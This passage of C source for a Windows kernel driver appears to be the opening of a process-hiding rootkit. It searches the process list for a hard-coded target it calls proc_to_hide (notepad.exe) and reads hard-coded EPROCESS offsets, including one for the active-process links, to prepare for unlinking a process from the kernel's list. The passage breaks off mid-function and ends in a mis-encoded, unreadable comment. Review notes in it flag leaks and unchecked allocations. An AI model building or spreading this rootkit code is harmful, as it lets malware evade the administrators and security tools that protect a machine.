#include <ntddk.h>
typedef ULONG DWORD;
/*
 * Hard-coded byte offsets into the (opaque) EPROCESS object. PIDOFFSET is
 * dereferenced against PsGetCurrentProcess() in FindProcessEPROC to read the
 * process id; FLINKOFFSET is not used in the visible part of the file
 * (presumably the ActiveProcessLinks entry, judging by the name). Such
 * offsets differ between Windows builds and are not validated at runtime.
 */
#define PIDOFFSET 0x84
#define FLINKOFFSET 0x88
/*
 * File-scope scratch state. eproc and start_PID are written by
 * FindProcessEPROC (eproc = PsGetCurrentProcess(), start_PID = the int read at
 * eproc + PIDOFFSET). currProc, plist_activ_procs, current_PID and i_count are
 * not referenced in the visible part of the file.
 */
PEPROCESS currProc;
DWORD eproc;
PLIST_ENTRY plist_activ_procs;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;
/*
 * Per-thread record that follows each SYSTEM_PROCESSES entry in the
 * SystemProcessInformation buffer. Declared locally because ntddk.h does not
 * provide it; the field order must match the native layout, so nothing here
 * may be reordered. No field of this struct is read in the visible code.
 */
typedef struct _SYSTEM_THREADS {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;
/*
 * One process entry of the SystemProcessInformation buffer returned by
 * ZwQuerySystemInformation(5, ...). Declared locally because ntddk.h does not
 * provide it; layout must match the native one, so fields may not be reordered.
 * GetProcessID walks entries via NextEntryDelta and reads ProcessName and
 * ProcessId.
 */
typedef struct _SYSTEM_PROCESSES {
/* Byte distance from this entry to the next; 0 marks the last entry. */
ULONG NextEntryDelta;
/* Number of SYSTEM_THREADS records in Threads[] (presumably; not used here). */
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
/* Image name; Buffer can be NULL, which GetProcessID checks before wcscmp. */
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
/* Present only in the Windows 2000+ layout; changes sizeof and the Threads offset. */
#if _WIN32_WINNT >= 0x500
IO_COUNTERS IoCounters;
#endif
/* Trailing variable-length array of thread records. */
SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES, * PSYSTEM_PROCESSES;
/*
 * Prototype for the native system-information query; declared here because
 * ntddk.h does not export it. GetProcessID calls it with information class 5
 * (SystemProcessInformation) and passes 0 for ReturnLength. On a too-small
 * buffer it returns STATUS_INFO_LENGTH_MISMATCH, which the caller loops on.
 */
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation (
IN ULONG SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG Length,
OUT PULONG ReturnLength
);
/*
 * Driver unload callback. Performs no cleanup of its own; it only emits a
 * debug trace so the unload shows up in a kernel debugger.
 */
void OnUnload(IN PDRIVER_OBJECT driverObject)
{
(void)driverObject; /* not needed for the trace */
DbgPrint("Driver is unload\n");
}
/*
 * Returns the ProcessId of the first SystemProcessInformation entry whose
 * image name equals the hard-coded "notepad.exe", or 0 if none matches.
 *
 * NOTE(review): pBuffer is allocated from NonPagedPool and never freed on any
 * path, and the ExAllocatePool result is not checked before it is passed on.
 * NOTE(review): cbBuffer is not grown between retries, so on
 * STATUS_INFO_LENGTH_MISMATCH the same query is repeated with the same size,
 * and each iteration drops the previous allocation.
 * NOTE(review): any failing status other than STATUS_INFO_LENGTH_MISMATCH is
 * ignored and the buffer is still parsed.
 */
ULONG GetProcessID()
{
NTSTATUS status;
ULONG cbBuffer = 0x8000;
/* Name compared case-sensitively (wcscmp) against each entry's ProcessName. */
WCHAR proc_to_hide[] = L"notepad.exe";
SYSTEM_PROCESSES* spProcesses;
ULONG processID = 0;
CHAR* pBuffer;
do
{
pBuffer = ExAllocatePool(NonPagedPool, cbBuffer);
/* Information class 5 = SystemProcessInformation; ReturnLength not requested. */
status = ZwQuerySystemInformation(5, pBuffer, cbBuffer, 0);
}while(STATUS_INFO_LENGTH_MISMATCH == status);
spProcesses = (SYSTEM_PROCESSES*)pBuffer;
while(1)
{
WCHAR* proc_name = spProcesses -> ProcessName.Buffer;
/* Entries with a NULL name buffer are skipped rather than compared. */
if(!!proc_name)
{
if( !wcscmp(proc_name, proc_to_hide))
{
processID = spProcesses->ProcessId;
return processID;
break; /* unreachable: follows the return above */
}
}
/* NextEntryDelta == 0 marks the last entry of the list. */
if( !spProcesses->NextEntryDelta )
break;
spProcesses = (PSYSTEM_PROCESSES)((CHAR*)spProcesses + spProcesses->NextEntryDelta);
}
return (ULONG)0;
}
DWORD FindProcessEPROC(int terminate_PID)
{
//DbgPrint("Entering to <<FindProcessEPROC>>...");
//DbgPrint("terminate_PID is %d", terminate_PID);
eproc = 0x00000000;
//PLIST_ENTRY plist_activ_procs;
eproc = (DWORD)PsGetCurrentProcess();
//DbgPrint("eproc is %d", eproc);
if(terminate_PID == 0)
return terminate_PID;
start_PID = *((int*)(eproc + PIDOFFSET));// 篑蜞磬怆桠噱